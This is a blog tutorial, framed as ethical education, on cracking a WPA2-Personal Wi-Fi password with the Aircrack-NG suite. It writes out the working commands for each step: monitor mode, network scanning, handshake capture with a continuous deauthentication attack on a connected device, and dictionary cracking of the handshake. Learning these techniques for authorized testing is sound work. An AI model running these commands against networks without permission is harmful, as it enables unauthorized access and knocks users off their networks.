The Art of Wi-Fi Hacking: An Ethical Guide for Education and Research

toto001
5 min readApr 2, 2023

--

Disclaimer

We want to be absolutely clear on this point. As much fun as it might seem to hack into your neighbor’s wireless network or a secured network at a friend’s house, hotel, or other location, don’t do it. You need to have permission from the network owner if you are to do any kind of hacking or penetration testing on their systems.

It might not seem like a big deal, but hacking a system without permission can hold extremely steep legal penalties, including jail time, depending on your location.

-To hack a wireless network, you need a wireless card with two features:

  1. Make sure your card supports monitor mode/promiscuous mode
  2. Make sure you card is capable of performing packet injection

We have bad news for you. It is almost certain that your onboard network card is incapable of this. You will need to purchase an external network adapter — and it has to have these specific (and uncommon) abilities.

You can buy the network adapter from here .

Set Up Kali

If you don’t have Kali Linux installed, see our article How To Install Kali Linux on VirtualBox.

Let’s Start Hacking

We’re now going to go through the step-by-step process of hacking a WPA2-Personal WiFi network.

There are several programs we can use, but this article will only focus on using the Aircrack-NG suite of tools. We encourage you to try some of the other tools mentioned in the Frequently Asked Questions.

Promiscuous Mode

In most cases, a network card only listens for traffic sent to its MAC Address. Promiscuous mode (also called monitor mode) tells the card to listen to all traffic, not just traffic directed to it.

Let’s switch to root using the command sudo su. You will be prompted for your Kali password.

Use ifconfig to see what our network card is. We see below it’s wlan0.

Using iwconfig we see the adapter is currently in managed mode (not monitor).

We will use Airmon-NG to set the adapter to monitor mode enabled.

First, we end any processes that might interfere using the command

airmon-ng check kill

Then change the adapter’s mode using

airmon-ng start wlan0

Use whatever your adapter name is, if different. Your adapter name will change, adding the letters “mon” to the end (for monitor). In our case, it became wlan0mon

Scanning For Networks

Now that we are in monitor mode, we can begin scanning. We will use the program Airodump-NG, with the -i flag to indicate the interface to listen on, then the name of our interface (which in our case is wlan0mon).

airodump-ng -i wlan0mon

We are picking up all kinds of traffic. Let’s examine what we see.

  • BSSID is the MAC address of the access points we can see.
  • CH is the channel they are running on (WPA2 typically runs on channel 1, 6, or 11).
  • ENC is the encryption method. In this picture we see two open networks, and many WPA2.
  • AUTH is the authentication method used to connect to the network. PSK stands for pre-shared key.
  • ESSID is the common name of the wireless network. We can see our target network, as well as the MAC address and the channel it is running on.
  • STATION lists the MAC address of devices connected to the different networks.

Capturing Traffic

Now that we know our target’s BSSID, let’s capture packets only going to our target and save it as a capture file. We will use Airodump-NG again, with the –channel flag to indicate the channel to listen on, the –bsside flag to let it know what device to listen to, and the — write command to name the capture.

airodump-ng --channel 1 --bssid EC:AD:E0:AB:93:34 --write HackDump wlan0mon

All the data is now being saved to a capture file. We can see one device connected to this network (the phone we connected to this access point — connect a device if you haven’t already).

What we want to capture is a device successfully connecting to the network. We call this the handshake. The best way for us to accomplish this is to run an attack against the connected device and kick it from the network. It will attempt to reconnect, allowing us to capture the handshake.

In a new terminal, we will run Aireplay-NG using the following flags

–deauth <num> (we will use the number zero, which means keep attacking until we say stop)

–a <BSSID>
–c <STATION>
And then list the interface

aireplay-ng --deauth 0 -a EC:AD:E0:AB:93:34 -c F2:98:XX:XX:XX:XX wlan0mon

After letting this run for a while, hit ctrl+c to stop the attack. In roughly 10 seconds, we had enough information in the capture to start cracking. You can also stop the packet capture in the other terminal window now.

You can see all the files that were saved. The *.cap file is the one we need.

Cracking the Password

We will use the program aircrack-ng to run a dictionary attack against the captured handshake and try to break the password. We are using the fern-wifi common password file, as mentioned earlier.

The command is:

aircrack-ng HackDump-01.cap -w /usr/share/wordlists/fern-wifi/common.txt

The cracking attempts begin. We already know the password was in this list. In under one second, Aircrack-NG tried 400 passwords and found the correct one. We now have access to this network.

--

--

toto001

Hello I'm TOTO001, i started cybersecurity since 2019 and i decided to start programming within 4 month. I also try bugbounty.I will share my experience here.